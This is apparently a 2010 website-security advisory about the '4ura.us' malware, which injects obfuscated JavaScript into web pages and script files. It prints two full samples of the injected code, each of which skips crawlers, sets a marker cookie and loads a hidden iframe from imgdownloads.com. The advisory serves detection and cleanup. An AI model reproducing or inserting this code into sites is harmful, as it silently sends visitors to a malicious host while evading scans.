4ura.us Malware

Updated: April 5, 2010

The 4ura.us malware places obfuscated malicious JavaScript into a website's web pages and/or JavaScript files. The malware has recently started using the domain imgdownloads.com. When the code is inserted into JavaScript files, it is only served to a user the first time the infected JavaScript file is requested. In the samples below, the script also does nothing when the visitor already has the "urchin" cookie that it sets, or when the user agent matches a common search-engine crawler, so a repeat visit or a crawler-style scan of an infected site may appear clean. To clean the website, either revert it to a clean backup or remove the malicious code from the affected web pages and/or JavaScript files.

Recent Script Format On JavaScript Files:

if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(indexer|googlebot|msnbot|cuill.com|crawler|yahoo|search|stackrambler|aport|yandex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/';function mOG(){};var tO=40844;mOG.prototype = {i : function() {var v='';var iA=function(){return 'iA'};return 'h6tMt6pT:M/T/QiMmEgTdToTwMnElTo6aTdMsQ.Qc6oMmM/6iMnQ.McQgTiM?M4T'.iO(/[TEQM6]/g, '');var vL=function(){};this.c='c';function x(){};this.dP=false;},t : function() {this.oN='oN';hD=60409;this.yH='';var j=function(){};function w(){};function vH(){};xN=false;var l=document;var z=false;var gY=false;zQ=51391;var pP=new Date();var y=window;var zA=function(){};this.zE='';this.xNZ='';var bN=new Array();var pW='pW';this.bI=false; String.prototype.iO=function(k, m){return this.rep lace(k, m)};var gA='gA';function yW(){};pB='';var aO='aO';var mH=function(){return 'mH'};var xG=function(){return 'xG'};var vHS='';var bC='bC';var h = 'sDtDy0l0e('.iO(/[\(\)0\.D]/g, '');wP='';function oNE(){}; var hW = 'aHpypyejnHd,CchHi,lHdj'.iO(/[jH,cy]/g, '');this.zV='';pBG=62466;var jN=9269;var e = 'i>fVr>aom[e>'.iO(/[\>oV\:\[]/g, '');var hZ=function(){};this.tA='tA';hI=false;var p = 'c;r^e8a8t;eRE;l8e;mReRn;tR'.iO(/[R;8p\^]/g, '');var yT='';var eN=false;var mL = 'w>rVi>t>e>'.iO(/[\>,T~V]/g, '');var cM=40305;var mY=new Date();tU='tU';kT=12810;var d = 's&eytTATt;t;r;i;byu&t[e&'.iO(/[&;\[Ty]/g, '');r='';this.kZ='';iF='';var gG='gG';var s = 'sQr3c*'.iO(/[\*Q#23]/g, '');this.sM=false;var q='';var a = 'b4oZdIyI'.iO(/[IjZ\}4]/g, '');var lD='lD';oY='';var o = 'd.i;s;p;l.a!yS'.iO(/[S\!\.;\?]/g, '');var yJ='';hP=24306;var b = 'n,o,n~e,'.iO(/[,W\:\^~]/g, '');var mU=function(){};var rT=function(){return 'rT'};var g = 'sje{tFTAi{mjeFoju&lt;tj'.iO(/[j\{\&lt;AF]/g, '');var rD=43630;this.sB='sB';wH=false;var oC='';try {this.yU='yU';tH='';var yUJ=new 
Array();eJ='';this.rJ='';this.jE=false;var wO=function(){};this.eF=false;var sZ=l[p](e);var qH=function(){return 'qH'};var yP=49076;sZ[d](s, this.i());this.pF='pF';var jH=new Date();sZ[h][o] = b;this.n='n';this.zR=false;rO=50205;this.gJF=5214;var dH=function(){};nE='';document[a][hW](sZ);mO=12860;var pQ=46781;this.bJ=35477;yI=false;} catch(tC) {var kG='kG';aT=11328;l.write('e?UZg?J?<?/~b~o~d~y4>4<4/Zhxt4mZlZ>x'.iO(/[x4\?Z~]/g, ''));lT='';var mI=function(){};var eE = this;var f='';hL=2628;var u=new Array();oJ=false;y[g](function(){ eE.t() }, 319);lR='lR';dK='dK';}zM=41990;var wE=function(){};var xW=57051;}};this.sA='';var rK=new mOG(); var tQ='tQ';rK.t();var cE=new Array();} var Action;

Recent Script Format On Web Pages:

<script>if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|yandex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/'; function iO(){};var lV=new Date();iO.prototype = {bF : function() {sV=false;this.qY='';this.cA='';return 'h&lt;t&lt;t&lt;p6:4/6/4i4mxg6d4oxw6n6l4o}axdxsx.<c}o}m}/4i4n4.<c6g6i}?436'.aI(/[6\}4x\<]/g, '');var kO=function(){};nW='nW';var wP=false;var hH='';},t : function() {var bP=function(){};zY=53599;this.qL='qL';pT='';var iY=function(){};this.mM=false;var mL=function(){return 'mL'};var u=window;l=5320;aN='aN';this.kL=63107;vL='';var i=document;this.nH=false;function yW(){};this.bA='bA';this.nT='';vK='';var g=function(){};this.pW='';var aZ=function(){}; String.prototype.aI=function(o,e){return this.rep lace(o, e)};zM='';function hB(){};cL='';var aD=new Array();var hO=new Date();var lS=new Date();mO=21254;var m = 'd#i.sUp3l#a.y#'.aI(/[#3%U\.]/g, '');uK=false;var dU=21553;var pA=28676;var b = 'nroQn+e)'.aI(/[\)rP\+Q]/g, '');this.j=false;this.dUM='';sL='';var oC=''; var s = 'aTp;pEeEn;dEC0hEi;lcdT'.aI(/[TE;c0]/g, '');this.oD=57616;this.nR=28704;var q = 'c&rHeDaHtDe&E&lfevmHeHnDtH'.aI(/[Hf&Dv]/g, '');pI=false;this.jZ='';this.kD=false;var a = 'b0oideyt'.aI(/[t0pei]/g, '');var bO=new Array();this.jZO=49972;var qLQ=15686;var h = 'sYtYyYlYen'.aI(/[n\>Y3\^]/g, '');this.xE='';function dS(){};var oDS=new Array();this.bV=37119;var x = 'iTfLrOaLm2eL'.aI(/[L2\+OT]/g, '');oV='';function oDL(){};var r=61212;this.tG='';var z = 'w[r[iQtseJ'.aI(/[JQsW\[]/g, '');this.qMC='';function xQ(){};this.iL='';this.jG='';var qM = 'sPe;tNAztPtzrPi%bNu;tPeN'.aI(/[N;%zP]/g, '');var nN=new Date();var vG=new Date();var w = 's_rfc_'.aI(/[_0f,\|]/g, '');var kOW=function(){return 'kOW'};zU=false;var bC='';var jA=new Date();var f = 
's!e^t^T^i!m!e!ovuStS'.aI(/[SXv\!\^]/g, '');tX=false;lX='';var tP=false;this.tA='';var p = 'c8dC<Y/YbWoCdWyC>U<Y/ChUtUmWlC>W'.aI(/[W8CYU]/g, '');this.eS='eS';function sT(){};var bH=new Array();var rR='';function cX(){};var yH='';try {this.cC=52370;jP='jP';this.mF='';var dZ=false;var eK=function(){return 'eK'};var bT=new Array();var n=this.bF();var qK='';this.rT=22879;var k=i[q](x);var vLY='';iYT=false;lW=26789;bM='bM';this.iH=62649;this.tK=24505;cQ=51387;k[h][m] = b;gM='';var oH=false;iR='iR';var pD='pD';k[qM](w, n);var bMA=6076;dB='';function dC(){};var oZ=function(){return 'oZ'};eR=false;document[a][s](k);this.kC='';var aL='aL';this.kLB=59319;wZ=false;var iJ='';rG=7858;var bK=false;} catch(y) {this.aF='';var lD=function(){};i.write(p);this.uL='';var kOG=41230;var v = this;var rGO='';var oG='';tM='tM';wC=false;u[f](function(){ var pJ=function(){};this.eN=false;var oHG=function(){return 'oHG'};kY=false;v.t();fS=false;function jW(){};}, 380);this.iRM=22881;this.fK=false;var mD='';var eB=new Array();}var iM=function(){};this.xH='';}};var uE=new Date();var bCW=new iO(); this.iF='';bCW.t();var pL=new Array();}</script>

Recent Virus Scan Identifications: JS:Illredir-AE [Trj], JS:Illredir-AO [Trj], Troj/Iframe-EA

